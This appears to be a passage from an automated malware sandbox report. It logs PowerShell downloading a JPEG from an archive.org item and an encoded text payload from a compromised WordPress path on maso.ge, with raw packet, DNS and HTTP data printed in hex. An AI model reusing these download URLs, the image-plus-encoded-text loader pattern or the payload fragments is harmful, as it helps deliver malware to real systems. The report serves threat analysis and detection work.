                            Aug 12, 2024 11:37:09.120054960 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.120270014 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.120276928 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.120332956 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.122076035 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.122097969 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.122147083 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.122174978 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.166579008 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.166683912 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.275511980 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.275620937 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.276519060 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.276607037 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.277556896 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.277614117 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.278876066 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.278933048 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.279889107 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.279941082 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.321898937 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.322021008 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.322860003 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.322926998 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.431540012 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.431752920 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.432106972 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.432179928 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.432560921 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.432629108 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.433170080 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.433233023 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.433737993 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.433798075 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.434472084 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.434530020 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.434942007 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.434998035 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.435672998 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.435729980 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.436988115 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.437050104 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.437423944 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.437484980 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.437953949 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.438008070 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.478674889 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.478751898 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.478887081 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.478945017 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.518907070 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.519006968 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.519251108 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.519311905 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.603120089 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.603228092 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.607496023 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.607563019 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.607995987 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.608055115 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.609148979 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.609210014 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.610044003 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.610110044 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.611408949 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.611462116 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.612452030 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.612502098 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.612859964 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.612912893 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.613262892 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.613322973 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.613977909 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.614028931 CEST44349705195.54.178.4192.168.2.5
                            Aug 12, 2024 11:37:09.614073038 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.622031927 CEST49705443192.168.2.5195.54.178.4
                            Aug 12, 2024 11:37:09.622041941 CEST44349705195.54.178.4192.168.2.5
                            TimestampSource PortDest PortSource IPDest IP
                            Aug 12, 2024 11:37:04.529937029 CEST6101053192.168.2.51.1.1.1
                            Aug 12, 2024 11:37:04.682049036 CEST53610101.1.1.1192.168.2.5
                            Aug 12, 2024 11:37:07.420547009 CEST6474053192.168.2.51.1.1.1
                            Aug 12, 2024 11:37:07.689033031 CEST53647401.1.1.1192.168.2.5

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Aug 12, 2024 11:37:04.529937029 CEST192.168.2.51.1.1.10xfbfcStandard query (0)ia601606.us.archive.orgA (IP address)IN (0x0001)false
                            Aug 12, 2024 11:37:07.420547009 CEST192.168.2.51.1.1.10x6d47Standard query (0)maso.geA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Aug 12, 2024 11:37:04.682049036 CEST1.1.1.1192.168.2.50xfbfcNo error (0)ia601606.us.archive.org207.241.227.86A (IP address)IN (0x0001)false
                            Aug 12, 2024 11:37:07.689033031 CEST1.1.1.1192.168.2.50x6d47No error (0)maso.ge195.54.178.4A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • ia601606.us.archive.org
                            • maso.ge

                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.549704207.241.227.864436800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            TimestampBytes transferredDirectionData
                            2024-08-12 09:37:05 UTC112OUTGET /10/items/deathnote_202407/deathnote.jpg HTTP/1.1
                            Host: ia601606.us.archive.org
                            Connection: Keep-Alive
                            2024-08-12 09:37:05 UTC582INHTTP/1.1 200 OK
                            Server: nginx/1.25.1
                            Date: Mon, 12 Aug 2024 09:37:05 GMT
                            Content-Type: image/jpeg
                            Content-Length: 1931225
                            Last-Modified: Fri, 26 Jul 2024 22:09:28 GMT
                            Connection: close
                            ETag: "66a41e98-1d77d9"
                            Strict-Transport-Security: max-age=15724800
                            Expires: Mon, 12 Aug 2024 15:37:05 GMT
                            Cache-Control: max-age=21600
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                            Access-Control-Allow-Credentials: true
                            Accept-Ranges: bytes
                            2024-08-12 09:37:05 UTC15802INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                            Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                            2024-08-12 09:37:05 UTC16384INData Raw: 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b 33 82 a5 18 b5 55 83 ec 7d
                            Data Ascii: G"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e3U}
                            2024-08-12 09:37:05 UTC16384INData Raw: a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a 8d 7c a9 a3 d3 1d 8e 66 9c
                            Data Ascii: ;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy|f
                            2024-08-12 09:37:05 UTC16384INData Raw: 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca 08 5d b8 61 7c 63 e9 e4 28
                            Data Ascii: )!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6]a|c(
                            2024-08-12 09:37:05 UTC16384INData Raw: ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1 90 a2 ac 2e ae 15 68 10 4d
                            Data Ascii: G8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui.hM
                            2024-08-12 09:37:05 UTC16384INData Raw: dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d aa 8a 58 92 43 15 24 76 1f
                            Data Ascii: q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]XC$v
                            2024-08-12 09:37:05 UTC16384INData Raw: 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28 56 0e a7 72 f1 47 eb d7 8c
                            Data Ascii: 62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(VrG
                            2024-08-12 09:37:05 UTC16384INData Raw: 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93 ea b0 09 e3 25 27 75 72 43
                            Data Ascii: <U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|%'urC
                            2024-08-12 09:37:05 UTC16384INData Raw: 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad 53 23 6a da 35 44 24 ed 6d
                            Data Ascii: e`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pWS#j5D$m
                            2024-08-12 09:37:05 UTC16384INData Raw: e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a 7e 7e f8 19 92 e9 55 d6 49
                            Data Ascii: is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z~~UI


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.549705195.54.178.44436800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            TimestampBytes transferredDirectionData
                            2024-08-12 09:37:08 UTC73OUTGET /wp-admin/sky.txt HTTP/1.1
                            Host: maso.ge
                            Connection: Keep-Alive
                            2024-08-12 09:37:08 UTC209INHTTP/1.1 200 OK
                            Date: Mon, 12 Aug 2024 09:37:07 GMT
                            Server: Apache
                            Last-Modified: Sat, 10 Aug 2024 19:44:27 GMT
                            Accept-Ranges: bytes
                            Content-Length: 318124
                            Connection: close
                            Content-Type: text/plain
                            2024-08-12 09:37:08 UTC7983INData Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                            Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                            2024-08-12 09:37:09 UTC8000INData Raw: 42 41 38 50 41 4a 41 77 2f 41 67 41 41 2f 44 41 42 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 67 41 41 38 50 41 44 41 77 2f 41 4d 41 41 2f 44 51 41 41 38 50 41 41 41 77 2f 44 32 4c 35 2f 44 51 70 2f 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2f 44 51 70 2f 2f 50 68 2b 2b 2f 2f 42 45 51 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 41 41 41 41 2f 44
                            Data Ascii: BA8PAJAw/AgAA/DABA8PAAAw/AAAA/DgAA8PADAw/AMAA/DQAA8PAAAw/D2L5/DQp/DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/DQp//Ph++//BEQA/DAAA8PAAAw/AAAA/DAAA8PAAAw/AAAA/DAAA8PAAAw/AAAA/DAAA8PAAAw/AAAA/DAAA8PAAAw/AAAA/DAAA8PAAAw/AAAA/DAAA8PAAAw/AAAA/DAAA8PAAAw/AAAA/D
                            2024-08-12 09:37:09 UTC8000INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 50 41 48 32 2b 2f 67 42 47 59 2f 44 41 41 41 38 50 41 41 41 77 2f 62 41 6d 44 2f 37 42 62 50 38 2f 47 67 35 77 2f 65 77 32 44 2f 4c 52 56 4a 38 76 4a 31 4a 78 2f 70 59 58 46 2f 44 67 44 41 38 76 4b 37 56 78 2f 54 59 56 43 2f 48 78 54 49 38 66 47 5a 78 77 2f 76 49 34 46 2f 48 67 49 42 38 50 41 41 41 77 2f 41 41 41 41 2f 44 41 41 41 38 50 41 41 41 77 2f 71 6f 69 4b 2f 44 51 6d 2f 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2f 44 77 68 74 2f 76 5a 6d 5a 32 2f 41 41 41 41 2f 44 41 41 41 38 50 4b 39 4e 78 2f 76 77 34 46 2f 6a 53 66 54 38 2f 4c 4d 65 78 2f 75 55 34 46 2f 6e 78 5a 4d 38 2f 47 69 35 77 2f 41 34 41 41 2f 4c
                            Data Ascii: AAAAAAAAAAAAAAAAAA8PAH2+/gBGY/DAAA8PAAAw/bAmD/7BbP8/Gg5w/ew2D/LRVJ8vJ1Jx/pYXF/DgDA8vK7Vx/TYVC/HxTI8fGZxw/vI4F/HgIB8PAAAw/AAAA/DAAA8PAAAw/qoiK/DQm/DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/Dwht/vZmZ2/AAAA/DAAA8PK9Nx/vw4F/jSfT8/LMex/uU4F/nxZM8/Gi5w/A4AA/L
